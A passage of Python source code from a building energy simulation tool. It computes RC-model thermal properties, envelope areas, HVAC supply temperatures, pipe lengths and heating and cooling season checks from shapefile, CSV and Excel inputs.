# df_windows = geometry_reader.create_windows(surface_properties, prop_envelope)
# TODO: to check if the Win_op and height of window is necessary.
# TODO: maybe mergin branch i9 with CItyGML could help with this
print("done")
# save resulting data
self._prop_supply_systems = prop_supply_systems
self._prop_geometry = prop_geometry
self._prop_envelope = prop_envelope
self._prop_typology = prop_typology
self._prop_HVAC_result = prop_HVAC_result
self._prop_comfort = prop_comfort
self._prop_internal_loads = prop_internal_loads
self._prop_age = prop_typology[['YEAR']]
self._solar = solar
self._prop_RC_model = prop_rc_model
def calc_bounding_box_geom(self, geometry_shapefile):
import shapefile
sf = shapefile.Reader(geometry_shapefile)
shapes = sf.shapes()
len_shapes = len(shapes)
bwidth = []
blength = []
for shape in range(len_shapes):
bbox = shapes[shape].bbox
coords_bbox = [coord for coord in bbox]
delta1 = abs(coords_bbox[0] - coords_bbox[2])
delta2 = abs(coords_bbox[1] - coords_bbox[3])
if delta1 >= delta2:
bwidth.append(delta2)
blength.append(delta1)
else:
bwidth.append(delta1)
blength.append(delta2)
return blength, bwidth
def __len__(self):
"""return length of list_building_names"""
return len(self.building_names)
def list_building_names(self):
"""get list of all building names"""
return self.building_names
def list_uses(self):
"""get list of all uses (typology types)"""
return list(set(self._prop_typology['USE'].values))
def get_prop_supply_systems(self, name_building):
"""get geometry of a building by name"""
return self._prop_supply_systems.loc[name_building].to_dict()
def get_prop_geometry(self, name_building):
"""get geometry of a building by name"""
return self._prop_geometry.loc[name_building].to_dict()
def get_prop_envelope(self, name_building):
"""get the architecture and thermal properties of a building by name"""
return self._prop_envelope.loc[name_building].to_dict()
def get_prop_typology(self, name_building):
"""get the typology properties of a building by name"""
return self._prop_typology.loc[name_building].to_dict()
def get_prop_hvac(self, name_building):
"""get HVAC properties of a building by name"""
return self._prop_HVAC_result.loc[name_building].to_dict()
def get_prop_rc_model(self, name_building):
"""get RC-model properties of a building by name"""
return self._prop_RC_model.loc[name_building].to_dict()
def get_prop_comfort(self, name_building):
"""get comfort properties of a building by name"""
return self._prop_comfort.loc[name_building].to_dict()
def get_prop_internal_loads(self, name_building):
"""get internal loads properties of a building by name"""
return self._prop_internal_loads.loc[name_building].to_dict()
def get_prop_age(self, name_building):
"""get age properties of a building by name"""
return self._prop_age.loc[name_building].to_dict()
def get_solar(self, name_building):
"""get solar properties of a building by name"""
return self._solar.loc[name_building]
def calc_prop_rc_model(self, locator, typology, envelope, geometry, hvac_temperatures):
"""
Return the RC model properties for all buildings. The RC model used is described in ISO 13790:2008, Annex C (Full
set of equations for simple hourly method).
:param typology: The contents of the `typology.shp` file, indexed by building name. Each column is the name of an
typology type (GYM, HOSPITAL, HOTEL, INDUSTRIAL, MULTI_RES, OFFICE, PARKING, etc.) except for the
"PFloor" column which is a fraction of heated floor area.
The typology types must add up to 1.0.
:type typology: Gdf
:param envelope: The contents of the `architecture.shp` file, indexed by building name.
It contains the following fields:
- n50: Air tightness at 50 Pa [h^-1].
- type_shade: shading system type.
- win_wall: window to wall ratio.
- U_base: U value of the floor construction [W/m2K]
- U_roof: U value of roof construction [W/m2K]
- U_wall: U value of wall construction [W/m2K]
- U_win: U value of window construction [W/m2K]
- Hs: Fraction of gross floor area that is heated/cooled {0 <= Hs <= 1}
- Cm_Af: Internal heat capacity per unit of area [J/K.m2]
:type envelope: Gdf
:param geometry: The contents of the `zone.shp` file indexed by building name - the list of buildings, their floor
counts, heights etc.
Includes additional fields "footprint" and "perimeter" as calculated in `read_building_properties`.
:type geometry: Gdf
:param hvac_temperatures: The return value of `get_properties_technical_systems`.
:type hvac_temperatures: DataFrame
:returns: RC model properties per building
:rtype: DataFrame
Sample result data calculated or manipulated by this method:
Name: B153767
datatype: float64
========= ============ ================================================================================================
Column e.g. Description
========= ============ ================================================================================================
Atot 4.564827e+03 (area of all surfaces facing the building zone in [m2])
Aw 4.527014e+02 (area of windows in [m2])
Am 6.947967e+03 (effective mass area in [m2])
Aef 2.171240e+03 (floor area with electricity in [m2])
Af 2.171240e+03 (conditioned floor area (heated/cooled) in [m2])
Cm 6.513719e+08 (internal heat capacity in [J/k])
Htr_is 1.574865e+04 (thermal transmission coefficient between air and surface nodes in RC-model in [W/K])
Htr_em 5.829963e+02 (thermal transmission coefficient between exterior and thermal mass nodes in RC-model in [W/K])
Htr_ms 6.322650e+04 (thermal transmission coefficient between surface and thermal mass nodes in RC-model in [W/K])
Htr_op 5.776698e+02 (thermal transmission coefficient for opaque surfaces in [W/K])
Hg 2.857637e+02 (steady-state thermal transmission coefficient to the ground in [W/K])
HD 2.919060e+02 (direct thermal transmission coefficient to the external environment in [W/K])
Htr_w 1.403374e+03 (thermal transmission coefficient for windows and glazing in [W/K])
========= ============ ================================================================================================
FIXME: rename Awall_all to something more sane...
"""
# calculate building geometry
df = self.geometry_reader_radiation_daysim(locator, envelope, geometry)
df = df.merge(typology, left_index=True, right_index=True)
df = df.merge(hvac_temperatures, left_index=True, right_index=True)
from cea.demand.control_heating_cooling_systems import has_heating_system, has_cooling_system
for building in self.building_names:
has_system_heating_flag = has_heating_system(hvac_temperatures.loc[building, 'class_hs'])
has_system_cooling_flag = has_cooling_system(hvac_temperatures.loc[building, 'class_cs'])
if (not has_system_heating_flag and not has_system_cooling_flag and
np.max([df.loc[building, 'Hs_ag'], df.loc[building, 'Hs_bg']]) <= 0.0):
df.loc[building, 'Hs_ag'] = 0.0
df.loc[building, 'Hs_bg'] = 0.0
print('Building {building} has no heating and cooling system, Hs corrected to 0.'.format(
building=building))
df = calc_useful_areas(df)
if 'Cm_Af' in self.get_overrides_columns():
# Internal heat capacity is not part of input, calculate [J/K]
df['Cm'] = self._overrides['Cm_Af'] * df['Af']
else:
df['Cm'] = df['Cm_Af'] * df['Af']
df['Am'] = df['Cm_Af'].apply(self.lookup_effective_mass_area_factor) * df['Af'] # Effective mass area in [m2]
# Steady-state Thermal transmittance coefficients and Internal heat Capacity
# Thermal transmission coefficient for windows and glazing in [W/K]
# Weigh area of windows with fraction of air-conditioned space, relationship of area and perimeter is squared
df['Htr_w'] = df['Awin_ag'] * df['U_win'] * np.sqrt(df['Hs_ag'])
# direct thermal transmission coefficient to the external environment in [W/K]
# Weigh area of with fraction of air-conditioned space, relationship of area and perimeter is squared
df['HD'] = df['Awall_ag'] * df['U_wall'] * np.sqrt(df['Hs_ag']) + df['Aroof'] * df['U_roof'] * df['Hs_ag']
# steady-state Thermal transmission coefficient to the ground. in W/K
df['Hg'] = B_F * df['Aop_bg'] * df['U_base'] * df['Hs_bg']
# calculate RC model properties
df['Htr_op'] = df['Hg'] + df['HD']
df['Htr_ms'] = H_MS * df['Am'] # Coupling conductance 1 in W/K
df['Htr_em'] = 1 / (1 / df['Htr_op'] - 1 / df['Htr_ms']) # Coupling conductance 2 in W/K
df['Htr_is'] = H_IS * df['Atot']
fields = ['Atot', 'Awin_ag', 'Am', 'Aef', 'Af', 'Cm', 'Htr_is', 'Htr_em', 'Htr_ms', 'Htr_op', 'Hg', 'HD', 'Aroof',
'U_wall', 'U_roof', 'U_win', 'U_base', 'Htr_w', 'GFA_m2', 'Aocc', 'Aop_bg', 'empty_envelope_ratio',
'Awall_ag', 'footprint']
result = df[fields]
return result
def geometry_reader_radiation_daysim(self, locator, envelope, geometry):
"""
Reader which returns the radiation specific geometries from Daysim. Adjusts the imported data such that it is
consistent with other imported geometry parameters.
:param locator: an InputLocator for locating the input files
:param envelope: The contents of the `architecture.shp` file, indexed by building name.
:param typology: The contents of the `typology.shp` file, indexed by building name.
:param geometry: The contents of the `zone.shp` file indexed by building name.
:param floor_height: Height of the floor in [m].
:return: Adjusted Daysim geometry data containing the following:
- Name: Name of building.
- Aw: Area of windows for each building (using mean window to wall ratio for building, excluding voids) [m2]
- Awall_ag: Opaque wall areas above ground (excluding voids, windows and roof) [m2]
- Aop_bg: Opaque areas below ground (including ground floor, excluding voids and windows) [m2]
- Aroof: Area of the roof (considered flat and equal to the building footprint) [m2]
- GFA_m2: Gross floor area [m2]
- floors: Sum of floors below ground (floors_bg) and floors above ground (floors_ag) [m2]
- surface_volume: Surface to volume ratio [m^-1]
:rtype: DataFrame
Data is read from :py:meth:`cea.inputlocator.InputLocator.get_radiation_metadata`
(e.g.
``C:/scenario/outputs/data/solar-radiation/{building_name}_geometry.csv``)
Note: File generated by the radiation script. It contains the fields Name, Freeheight, FactorShade, height_ag and
Shape_Leng. This data is used to calculate the wall and window areas.)
"""
# add result columns to envelope df
envelope['Awall_ag'] = np.nan
envelope['Awin_ag'] = np.nan
envelope['Aroof'] = np.nan
# call all building geometry files in a loop
for building_name in self.building_names:
geometry_data = pd.read_csv(locator.get_radiation_building(building_name))
envelope.loc[building_name, 'Awall_ag'] = geometry_data['walls_east_m2'][0] + \
geometry_data['walls_west_m2'][0] + \
geometry_data['walls_south_m2'][0] +\
geometry_data['walls_north_m2'][0]
envelope.loc[building_name, 'Awin_ag'] = geometry_data['windows_east_m2'][0] + \
geometry_data['windows_west_m2'][0] + \
geometry_data['windows_south_m2'][0] +\
geometry_data['windows_north_m2'][0]
envelope.loc[building_name, 'Aroof'] = geometry_data['roofs_top_m2'][0]
df = envelope.merge(geometry, left_index=True, right_index=True)
def calc_empty_envelope_ratio(void_deck_floors, height, floors, Awall, Awin):
if (Awall + Awin) > 0.0:
empty_envelope_ratio = 1 - ((void_deck_floors * (height / floors)) / (Awall + Awin))
else:
empty_envelope_ratio = 1
return empty_envelope_ratio
df['empty_envelope_ratio'] = df.apply(lambda x: calc_empty_envelope_ratio(x['void_deck'],
x['height_ag'],
x['floors_ag'],
x['Awall_ag'],
x['Awin_ag']), axis=1)
# adjust envelope areas with Void_deck
df['Awin_ag'] = df['Awin_ag'] * df['empty_envelope_ratio']
df['Awall_ag'] = df['Awall_ag'] * df['empty_envelope_ratio']
df['Aop_bg'] = df['height_bg'] * df['perimeter'] + df['footprint']
# get other cuantities.
df['floors'] = df['floors_bg'] + df['floors_ag']
df['GFA_m2'] = df['footprint'] * df['floors'] # gross floor area
df['GFA_ag_m2'] = df['footprint'] * df['floors_ag']
df['GFA_bg_m2'] = df['footprint'] * df['floors_bg']
return df
def lookup_effective_mass_area_factor(self, cm):
"""
Look up the factor to multiply the conditioned floor area by to get the effective mass area by building
construction type.
This is used for the calculation of the effective mass area "Am" in `get_prop_RC_model`.
Standard values can be found in the Annex G of ISO EN13790
:param: cm: The internal heat capacity per unit of area [J/m2].
:return: Effective mass area factor (0, 2.5 or 3.2 depending on cm value).
"""
if cm == 0.0:
return 0.0
elif 0.0 < cm <= 165000.0:
return 2.5
else:
return 3.2
def __getitem__(self, building_name):
"""return a (read-only) BuildingPropertiesRow for the building"""
return BuildingPropertiesRow(name=building_name,
geometry=self.get_prop_geometry(building_name),
envelope=self.get_prop_envelope(building_name),
typology=self.get_prop_typology(building_name),
hvac=self.get_prop_hvac(building_name),
rc_model=self.get_prop_rc_model(building_name),
comfort=self.get_prop_comfort(building_name),
internal_loads=self.get_prop_internal_loads(building_name),
age=self.get_prop_age(building_name),
solar=self.get_solar(building_name),
supply=self.get_prop_supply_systems(building_name))
def get_overrides_columns(self):
"""Return the list of column names in the `overrides.csv` file or an empty list if no such file
is present."""
if hasattr(self, '_overrides'):
return list(self._overrides.columns)
return []
def calc_useful_areas(df):
df['Aocc'] = df['GFA_m2'] * df['Ns'] # occupied floor area: all occupied areas in the building
# conditioned area: areas that are heated/cooled
df['Af'] = df['GFA_ag_m2'] * df['Hs_ag'] + df['GFA_bg_m2'] * df['Hs_bg']
df['Aef'] = df['GFA_m2'] * df['Es'] # electrified area: share of gross floor area that is also electrified
df['Atot'] = df['Af'] * LAMBDA_AT # area of all surfaces facing the building zone
return df
class BuildingPropertiesRow(object):
"""Encapsulate the data of a single row in the DataSets of BuildingProperties. This class meant to be
read-only."""
def __init__(self, name, geometry, envelope, typology, hvac,
rc_model, comfort, internal_loads, age, solar, supply):
"""Create a new instance of BuildingPropertiesRow - meant to be called by BuildingProperties[building_name].
Each of the arguments is a pandas Series object representing a row in the corresponding DataFrame."""
self.name = name
self.geometry = geometry
self.architecture = EnvelopeProperties(envelope)
self.typology = typology # FIXME: rename to uses!
self.hvac = hvac
self.rc_model = rc_model
self.comfort = comfort
self.internal_loads = internal_loads
self.age = age
self.solar = SolarProperties(solar)
self.supply = supply
self.building_systems = self._get_properties_building_systems()
def _get_properties_building_systems(self):
"""
Method for defining the building system properties, specifically the nominal supply and return temperatures,
equivalent pipe lengths and transmittance losses. The systems considered include an ahu (air
handling unit, rsu(air recirculation unit), and scu/shu (sensible cooling / sensible heating unit).
Note: it is assumed that building with less than a floor and less than 2 floors underground do not require
heating and cooling, and are not considered when calculating the building system properties.
:return: building_systems dict containing the following information:
Pipe Lengths:
- Lcww_dis: length of hot water piping in the distribution circuit (????) [m]
- Lsww_dis: length of hot water piping in the distribution circuit (????) [m]
- Lvww_dis: length of hot water piping in the distribution circuit (?????) [m]
- Lvww_c: length of piping in the heating system circulation circuit (ventilated/recirc?) [m]
- Lv: length vertical lines [m]
Heating Supply Temperatures:
- Ths_sup_ahu_0: heating supply temperature for AHU (C)
- Ths_sup_aru_0: heating supply temperature for ARU (C)
- Ths_sup_shu_0: heating supply temperature for SHU (C)
Heating Return Temperatures:
- Ths_re_ahu_0: heating return temperature for AHU (C)
- Ths_re_aru_0: heating return temperature for ARU (C)
- Ths_re_shu_0: heating return temperature for SHU (C)
Cooling Supply Temperatures:
- Tcs_sup_ahu_0: cooling supply temperature for AHU (C)
- Tcs_sup_aru_0: cooling supply temperature for ARU (C)
- Tcs_sup_scu_0: cooling supply temperature for SCU (C)
Cooling Return Temperatures:
- Tcs_re_ahu_0: cooling return temperature for AHU (C)
- Tcs_re_aru_0: cooling return temperature for ARU (C)
- Tcs_re_scu_0: cooling return temperature for SCU (C)
Water supply temperature??:
- Tww_sup_0: ?????
Thermal losses in pipes:
- Y: Linear trasmissivity coefficients of piping depending on year of construction [W/m.K]
Form Factor Adjustment:
- fforma: form factor comparison between real surface and rectangular ???
:rtype: dict
"""
# Refactored from CalcThermalLoads
# gemoetry properties.
Ll = self.geometry['Blength']
Lw = self.geometry['Bwidth']
nf_ag = self.geometry['floors_ag']
nf_bg = self.geometry['floors_bg']
phi_pipes = self._calculate_pipe_transmittance_values()
# nominal temperatures
Ths_sup_ahu_0 = float(self.hvac['Tshs0_ahu_C'])
Ths_re_ahu_0 = float(Ths_sup_ahu_0 - self.hvac['dThs0_ahu_C'])
Ths_sup_aru_0 = float(self.hvac['Tshs0_aru_C'])
Ths_re_aru_0 = float(Ths_sup_aru_0 - self.hvac['dThs0_aru_C'])
Ths_sup_shu_0 = float(self.hvac['Tshs0_shu_C'])
Ths_re_shu_0 = float(Ths_sup_shu_0 - self.hvac['dThs0_shu_C'])
Tcs_sup_ahu_0 = self.hvac['Tscs0_ahu_C']
Tcs_re_ahu_0 = Tcs_sup_ahu_0 + self.hvac['dTcs0_ahu_C']
Tcs_sup_aru_0 = self.hvac['Tscs0_aru_C']
Tcs_re_aru_0 = Tcs_sup_aru_0 + self.hvac['dTcs0_aru_C']
Tcs_sup_scu_0 = self.hvac['Tscs0_scu_C']
Tcs_re_scu_0 = Tcs_sup_scu_0 + self.hvac['dTcs0_scu_C']
Tww_sup_0 = self.hvac['Tsww0_C']
# Identification of equivalent lenghts
fforma = self._calc_form() # factor form comparison real surface and rectangular
Lv = (2 * Ll + 0.0325 * Ll * Lw + 6) * fforma # length vertical lines
if nf_ag < 2 and nf_bg < 2: # it is assumed that building with less than a floor and less than 2 floors udnerground do not have
Lcww_dis = 0
Lvww_c = 0
else:
Lcww_dis = 2 * (Ll + 2.5 + nf_ag * H_F) * fforma # length hot water piping circulation circuit
Lvww_c = (2 * Ll + 0.0125 * Ll * Lw) * fforma # length piping heating system circulation circuit
Lsww_dis = 0.038 * Ll * Lw * nf_ag * H_F * fforma # length hot water piping distribution circuit
Lvww_dis = (Ll + 0.0625 * Ll * Lw) * fforma # length piping heating system distribution circuit
building_systems = pd.Series({'Lcww_dis': Lcww_dis,
'Lsww_dis': Lsww_dis,
'Lv': Lv,
'Lvww_c': Lvww_c,
'Lvww_dis': Lvww_dis,
'Ths_sup_ahu_0': Ths_sup_ahu_0,
'Ths_re_ahu_0': Ths_re_ahu_0,
'Ths_sup_aru_0': Ths_sup_aru_0,
'Ths_re_aru_0': Ths_re_aru_0,
'Ths_sup_shu_0': Ths_sup_shu_0,
'Ths_re_shu_0': Ths_re_shu_0,
'Tcs_sup_ahu_0': Tcs_sup_ahu_0,
'Tcs_re_ahu_0': Tcs_re_ahu_0,
'Tcs_sup_aru_0': Tcs_sup_aru_0,
'Tcs_re_aru_0': Tcs_re_aru_0,
'Tcs_sup_scu_0': Tcs_sup_scu_0,
'Tcs_re_scu_0': Tcs_re_scu_0,
'Tww_sup_0': Tww_sup_0,
'Y': phi_pipes,
'fforma': fforma})
return building_systems
def _calculate_pipe_transmittance_values(self):
"""linear trasmissivity coefficients of piping W/(m.K)"""
if self.age['YEAR'] >= 1995:
phi_pipes = [0.2, 0.3, 0.3]
# elif 1985 <= self.age['built'] < 1995 and self.age['HVAC'] == 0:
elif 1985 <= self.age['YEAR'] < 1995:
phi_pipes = [0.3, 0.4, 0.4]
else:
phi_pipes = [0.4, 0.4, 0.4]
return phi_pipes
def _calc_form(self):
factor = self.geometry['footprint'] / (self.geometry['Bwidth'] * self.geometry['Blength'])
return factor
def weird_division(n, d):
return n / d if d else 0.0
class EnvelopeProperties(object):
"""Encapsulate a single row of the architecture input file for a building"""
def __init__(self, envelope):
self.A_op = envelope['Awin_ag'] + envelope['Awall_ag']
self.a_roof = envelope['a_roof']
self.n50 = envelope['n50']
self.win_wall = weird_division(envelope['Awin_ag'], self.A_op)
self.a_wall = envelope['a_wall']
self.rf_sh = envelope['rf_sh']
self.e_wall = envelope['e_wall']
self.e_roof = envelope['e_roof']
self.G_win = envelope['G_win']
self.e_win = envelope['e_win']
self.U_roof = envelope['U_roof']
self.Hs_ag = envelope['Hs_ag']
self.Hs_bg = envelope['Hs_bg']
self.Ns = envelope['Ns']
self.Es = envelope['Es']
self.Cm_Af = envelope['Cm_Af']
self.U_wall = envelope['U_wall']
self.U_base = envelope['U_base']
self.U_win = envelope['U_win']
class SolarProperties(object):
"""Encapsulates the solar properties of a building"""
__slots__ = ['I_sol']
def __init__(self, solar):
self.I_sol = solar['I_sol']
def get_properties_supply_sytems(locator, properties_supply):
data_all_in_one_systems = pd.read_excel(locator.get_database_supply_assemblies(), sheet_name=None)
supply_heating = data_all_in_one_systems['HEATING']
supply_dhw = data_all_in_one_systems['HOT_WATER']
supply_cooling = data_all_in_one_systems['COOLING']
supply_electricity = data_all_in_one_systems['ELECTRICITY']
df_emission_heating = properties_supply.merge(supply_heating, left_on='type_hs', right_on='code')
df_emission_cooling = properties_supply.merge(supply_cooling, left_on='type_cs', right_on='code')
df_emission_dhw = properties_supply.merge(supply_dhw, left_on='type_dhw', right_on='code')
df_emission_electricity = properties_supply.merge(supply_electricity, left_on='type_el', right_on='code')
df_emission_heating.rename(columns={"feedstock": "source_hs", "scale": "scale_hs", "efficiency": "eff_hs"},
inplace=True)
df_emission_cooling.rename(columns={"feedstock": "source_cs", "scale": "scale_cs", "efficiency": "eff_cs"},
inplace=True)
df_emission_dhw.rename(columns={"feedstock": "source_dhw", "scale": "scale_dhw", "efficiency": "eff_dhw"},
inplace=True)
df_emission_electricity.rename(columns={"feedstock": "source_el", "scale": "scale_el", "efficiency": "eff_el"},
inplace=True)
fields_emission_heating = ['Name', 'type_hs', 'type_cs', 'type_dhw', 'type_el',
'source_hs', 'scale_hs', 'eff_hs']
fields_emission_cooling = ['Name', 'source_cs', 'scale_cs', 'eff_cs']
fields_emission_dhw = ['Name', 'source_dhw', 'scale_dhw', 'eff_dhw']
fields_emission_el = ['Name', 'source_el', 'scale_el', 'eff_el']
result = df_emission_heating[fields_emission_heating].merge(df_emission_cooling[fields_emission_cooling],
on='Name').merge(
df_emission_dhw[fields_emission_dhw], on='Name').merge(df_emission_electricity[fields_emission_el], on='Name')
return result
def get_properties_technical_systems(locator, prop_HVAC):
"""
Return temperature data per building based on the HVAC systems of the building. Uses the `emission_systems.xls`
file to look up properties
:param locator: an InputLocator for locating the input files
:type locator: cea.inputlocator.InputLocator
:param prop_HVAC: HVAC properties for each building (type of cooling system, control system, domestic hot water
system and heating system.
:type prop_HVAC: geopandas.GeoDataFrame
Sample data (first 5 rows)::
Name type_cs type_ctrl type_dhw type_hs type_vent
0 B154862 T0 T1 T1 T1 T0
1 B153604 T0 T1 T1 T1 T0
2 B153831 T0 T1 T1 T1 T0
3 B302022960 T0 T0 T0 T0 T0
4 B302034063 T0 T0 T0 T0 T0
:returns: A DataFrame containing temperature data for each building in the scenario. More information can be
:rtype: DataFrame
Each row contains the following fields:
========== ======= ===========================================================================
Column e.g. Description
========== ======= ===========================================================================
Name B154862 (building name)
type_hs T1 (copied from input, code for type of heating system)
type_cs T0 (copied from input, code for type of cooling system)
type_dhw T1 (copied from input, code for type of hot water system)
type_ctrl T1 (copied from input, code for type of controller for heating and cooling system)
type_vent T1 (copied from input, code for type of ventilation system)
Tshs0_C 90 (heating system supply temperature at nominal conditions [C])
dThs0_C 20 (delta of heating system temperature at nominal conditions [C])
Qhsmax_Wm2 500 (maximum heating system power capacity per unit of gross built area [W/m2])
dThs_C 0.15 (correction temperature of emission losses due to type of heating system [C])
Tscs0_C 0 (cooling system supply temperature at nominal conditions [C])
dTcs0_C 0 (delta of cooling system temperature at nominal conditions [C])
Qcsmax_Wm2 0 (maximum cooling system power capacity per unit of gross built area [W/m2])
dTcs_C 0.5 (correction temperature of emission losses due to type of cooling system [C])
dT_Qhs 1.2 (correction temperature of emission losses due to control system of heating [C])
dT_Qcs -1.2 (correction temperature of emission losses due to control system of cooling[C])
Tsww0_C 60 (dhw system supply temperature at nominal conditions [C])
Qwwmax_Wm2 500 (maximum dwh system power capacity per unit of gross built area [W/m2])
MECH_VENT True (copied from input, ventilation system configuration)
WIN_VENT False (copied from input, ventilation system configuration)
HEAT_REC True (copied from input, ventilation system configuration)
NIGHT_FLSH True (copied from input, ventilation system control strategy)
ECONOMIZER False (copied from input, ventilation system control strategy)
========== ======= ===========================================================================
Data is read from :py:meth:`cea.inputlocator.InputLocator.get_technical_emission_systems`
(e.g.
``db/Systems/emission_systems.csv``)
"""
prop_emission_heating = pd.read_excel(locator.get_database_air_conditioning_systems(), 'HEATING')
prop_emission_cooling = pd.read_excel(locator.get_database_air_conditioning_systems(), 'COOLING')
prop_emission_dhw = pd.read_excel(locator.get_database_air_conditioning_systems(), 'HOT_WATER')
prop_emission_control_heating_and_cooling = pd.read_excel(locator.get_database_air_conditioning_systems(),
'CONTROLLER')
prop_ventilation_system_and_control = pd.read_excel(locator.get_database_air_conditioning_systems(), 'VENTILATION')
df_emission_heating = prop_HVAC.merge(prop_emission_heating, left_on='type_hs', right_on='code')
df_emission_cooling = prop_HVAC.merge(prop_emission_cooling, left_on='type_cs', right_on='code')
df_emission_control_heating_and_cooling = prop_HVAC.merge(prop_emission_control_heating_and_cooling,
left_on='type_ctrl', right_on='code')
df_emission_dhw = prop_HVAC.merge(prop_emission_dhw, left_on='type_dhw', right_on='code')
df_ventilation_system_and_control = prop_HVAC.merge(prop_ventilation_system_and_control, left_on='type_vent',
right_on='code')
fields_emission_heating = ['Name', 'type_hs', 'type_cs', 'type_dhw', 'type_ctrl', 'type_vent', 'heat_starts',
'heat_ends', 'cool_starts', 'cool_ends', 'class_hs', 'convection_hs',
'Qhsmax_Wm2', 'dThs_C', 'Tshs0_ahu_C', 'dThs0_ahu_C', 'Th_sup_air_ahu_C', 'Tshs0_aru_C',
'dThs0_aru_C', 'Th_sup_air_aru_C', 'Tshs0_shu_C', 'dThs0_shu_C']
fields_emission_cooling = ['Name', 'Qcsmax_Wm2', 'dTcs_C', 'Tscs0_ahu_C', 'dTcs0_ahu_C', 'Tc_sup_air_ahu_C',
'Tscs0_aru_C', 'dTcs0_aru_C', 'Tc_sup_air_aru_C', 'Tscs0_scu_C', 'dTcs0_scu_C',
'class_cs', 'convection_cs']
fields_emission_control_heating_and_cooling = ['Name', 'dT_Qhs', 'dT_Qcs']
fields_emission_dhw = ['Name', 'Tsww0_C', 'Qwwmax_Wm2']
fields_system_ctrl_vent = ['Name', 'MECH_VENT', 'WIN_VENT', 'HEAT_REC', 'NIGHT_FLSH', 'ECONOMIZER']
result = df_emission_heating[fields_emission_heating].merge(df_emission_cooling[fields_emission_cooling],
on='Name').merge(
df_emission_control_heating_and_cooling[fields_emission_control_heating_and_cooling],
on='Name').merge(df_emission_dhw[fields_emission_dhw],
on='Name').merge(df_ventilation_system_and_control[fields_system_ctrl_vent], on='Name')
# read region-specific control parameters (identical for all buildings), i.e. heating and cooling season
result['has-heating-season'] = result.apply(lambda x: verify_has_season(x['Name'],
x['heat_starts'],
x['heat_ends']), axis=1)
result['has-cooling-season'] = result.apply(lambda x: verify_has_season(x['Name'],
x['cool_starts'],
x['cool_ends']), axis=1)
# verify seasons do not overlap
result['overlap-season'] = result.apply(lambda x: verify_overlap_season(x['Name'],
x['has-heating-season'],
x['has-cooling-season'],
x['heat_starts'],
x['heat_ends'],
x['cool_starts'],
x['cool_ends']), axis=1)
return result
def verify_overlap_season(building_name, has_teating_season, has_cooling_season, heat_start, heat_end, cool_start,
cool_end):
if has_cooling_season and has_teating_season:
Range = namedtuple('Range', ['start', 'end'])
# for heating
day1, month1 = map(int, heat_start.split('|'))
day2, month2 = map(int, heat_end.split('|'))
if month2 > month1:
r1 = Range(start=datetime(2012, month1, day1), end=datetime(2012, month2, day2))
else:
r1 = Range(start=datetime(2012, month1, day1), end=datetime(2013, month2, day2))
# for cooling
day1, month1 = map(int, cool_start.split('|'))
day2, month2 = map(int, cool_end.split('|'))
if month2 > month1:
r2 = Range(start=datetime(2012, month1, day1), end=datetime(2012, month2, day2))
else:
r2 = Range(start=datetime(2012, month1, day1), end=datetime(2013, month2, day2))
latest_start = max(r1.start, r2.start)
earliest_end = min(r1.end, r2.end)
delta = (earliest_end - latest_start).days + 1
overlap = max(0, delta)
if overlap > 0:
raise Exception(
'invalid input found for building %s. heating and cooling seasons cannot overlap in CEA' % building_name)
else:
return False
def verify_has_season(building_name, start, end):
def invalid_date(date):
if len(date) != 5 or "|" not in date:
return True
elif "00" in date.split("|"):
return True
else:
return False
if start == '00|00' or end == '00|00':
return False
elif invalid_date(start) or invalid_date(end):
raise Exception(
'invalid input found for building %s. dates of season must comply to DD|MM format, DD|00 are values are not valid' % building_name)
else:
return True
def get_envelope_properties(locator, prop_architecture):
"""
Gets the building envelope properties from
``databases/Systems/emission_systems.csv``, including the following:
- prop_roof: Name, emissivity (e_roof), absorbtivity (a_roof), thermal resistance (U_roof), and fraction of
heated space (Hs).
- prop_wall: Name, emissivity (e_wall), absorbtivity (a_wall), thermal resistance (U_wall & U_base),
window to wall ratio of north, east, south, west walls (wwr_north, wwr_east, wwr_south, wwr_west).
- prop_win: Name, emissivity (e_win), solar factor (G_win), thermal resistance (U_win)
- prop_shading: Name, shading factor (rf_sh).
- prop_construction: Name, internal heat capacity (Cm_af), floor to ceiling voids (void_deck).
- prop_leakage: Name, exfiltration (n50).
Creates a merged df containing aforementioned envelope properties called envelope_prop.
:return: envelope_prop
:rtype: DataFrame
"""
def check_successful_merge(df_construction, df_leakage, df_roof, df_wall, df_win, df_shading, df_floor):
if len(df_construction.loc[df_construction['code'].isna()]) > 0:
raise ValueError(
'WARNING: Invalid construction type found in architecture inputs. The following buildings will not be modeled: {}.'.format(
list(df_construction.loc[df_shading['code'].isna()]['Name'])))
if len(df_leakage.loc[df_leakage['code'].isna()]) > 0:
raise ValueError(
'WARNING: Invalid leakage type found in architecture inputs. The following buildings will not be modeled: {}.'.format(
list(df_leakage.loc[df_leakage['code'].isna()]['Name'])))
if len(df_roof[df_roof['code'].isna()]) > 0:
raise ValueError(
'WARNING: Invalid roof type found in architecture inputs. The following buildings will not be modeled: {}.'.format(
list(df_roof.loc[df_roof['code'].isna()]['Name'])))
if len(df_wall.loc[df_wall['code'].isna()]) > 0:
raise ValueError(
'WARNING: Invalid wall type found in architecture inputs. The following buildings will not be modeled: {}.'.format(
list(df_wall.loc[df_wall['code'].isna()]['Name'])))
if len(df_win.loc[df_win['code'].isna()]) > 0:
raise ValueError(
'WARNING: Invalid window type found in architecture inputs. The following buildings will not be modeled: {}.'.format(
list(df_win.loc[df_win['code'].isna()]['Name'])))
if len(df_shading.loc[df_shading['code'].isna()]) > 0:
raise ValueError(
'WARNING: Invalid shading type found in architecture inputs. The following buildings will not be modeled: {}.'.format(
list(df_shading.loc[df_shading['code'].isna()]['Name'])))
if len(df_floor.loc[df_floor['code'].isna()]) > 0:
raise ValueError(
'WARNING: Invalid floor type found in architecture inputs. The following buildings will not be modeled: {}.'.format(
list(df_floor.loc[df_floor['code'].isna()]['Name'])))
prop_roof = pd.read_excel(locator.get_database_envelope_systems(), 'ROOF')
prop_wall = pd.read_excel(locator.get_database_envelope_systems(), 'WALL')
prop_floor = pd.read_excel(locator.get_database_envelope_systems(), 'FLOOR')
prop_win = pd.read_excel(locator.get_database_envelope_systems(), 'WINDOW')
prop_shading = pd.read_excel(locator.get_database_envelope_systems(), 'SHADING')
prop_construction = pd.read_excel(locator.get_database_envelope_systems(), 'CONSTRUCTION')
prop_leakage = pd.read_excel(locator.get_database_envelope_systems(), 'TIGHTNESS')
df_construction = prop_architecture.merge(prop_construction, left_on='type_cons', right_on='code', how='left')
df_leakage = prop_architecture.merge(prop_leakage, left_on='type_leak', right_on='code', how='left')
df_floor = prop_architecture.merge(prop_floor, left_on='type_base', right_on='code', how='left')
